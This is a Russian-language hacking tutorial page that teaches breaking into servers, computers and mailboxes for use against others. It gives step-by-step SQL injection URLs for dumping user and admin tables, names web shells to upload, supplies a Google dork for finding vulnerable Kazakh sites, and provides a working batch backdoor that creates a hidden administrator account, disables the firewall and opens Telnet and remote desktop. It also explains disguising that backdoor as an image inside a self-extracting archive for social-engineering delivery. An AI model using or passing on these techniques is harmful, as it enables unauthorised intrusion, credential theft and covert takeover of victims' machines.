Как разблокировать аккаунты, защитить компьютер и стать хакером
Рубрики
  • Рубрик нет
Полезные инструменты

Ваш IP

Узнай свой IP адрес

Проверить сайт

Test tools by WebSitePulse

Генератор MD5

1. Введите строку Строка:


2. Копировать MD5:

Реклама

интернетконецформыначалоформыЗдравствуйте.
Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов.
Методы взлома сервера:
SQL – injection
Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных,
используемых в SQL-запросах.
Пример
$id = $_REQUEST['id'];
$res = mysql_query(«SELECT * FROM news WHERE id_news = $id»);

http://example.org/script.php?id=5

ставим кавычку

http://example.org/script.php?id=5

Если она не фильтруется то выйдет ошибка:
(Warning: mysql(): supplied argument is not a valid MySQL result resource in)
Далее идет вычисление полей в таблице с помощью параметра ORDER BY
http://example.org/script.php?id=5+ORDER+BY+ предполагаемое количество полей —
Предположим полей 7 из них 3 выводятся на сайте.

http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7—

Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()

http://example.org/script.php?id=-5+ORDER+…sion(),4,5,6,7—

На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.
Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME
http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
Теперь в 3м поле выдут все таблицы которые находятся в базе.

http://example.org/script.php?id=-5+ORDER+…SCHEMA.COLUMNS—

Все колонки находящиеся в таблицах.
Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address
Составляем запрос

http://example.org/script.php?id=-5+ORDER+…6,7+FROM+users—

И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.
Остальные поля понятны.
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.
Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com
запрос: inurl:news.php?id=5 site:kz Warning: mysql
По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.
Взлом компьютера.
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.
Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!
Пример
.bat файл
chcp 1251
net user coolz 12333 /add
net localgroup Администраторы coolz /add
net localgroup Administrators coolz /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Создается отдельный пользователь в системе coolz и задается пароль 12333
Далее присваиваются права администратора. И открывается порт 972.
За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg
Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара
метры SFX
Путь для распаковки пишешь: %WinDir%temp
В окошке выполнять после распаковки
пишем наш архив с картинкой. 1.exe
Заводим во вкладку режимы выбираем скрыть все нажимаем ок
Теперь заходим во вкладку комментарий
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat
Внешний вид
Path=%WinDir%temp
SavePath
Setup=cool.bat
Setup=1.exe
Silent=1
Нажимаем ОК
Все замаскированный архив с батником готов
То есть после того как открывается архив выполняется бат файл за тем открывается картинка
После подключения к компьютеру можно открыть доступ к удаленному управлению
Для этого в командной строке вводятся следующие параметры
chcp 1251
net localgroup Пользователи удаленного рабочего стола coolz /add
net accounts /maxpwage:unlimited
REG ADD «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «coolz» /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto
Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)

О взломе ящика скажу коротко.
Есть 3 способа взлома:
1й перебор пароля по словарю
2й использование XSS уязвимости
3й соц.инженерия

Скорость печати
Набирайте отображаемый текст и вы узнаете вашу скорость набора текста


Рейтинг@Mail.ru


Copyright © 2018 Как разблокировать аккаунт. Все права защищены.